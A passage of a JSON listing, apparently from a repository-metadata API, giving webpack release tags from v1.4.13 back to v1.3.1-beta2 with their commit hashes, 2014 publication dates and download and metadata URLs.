},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published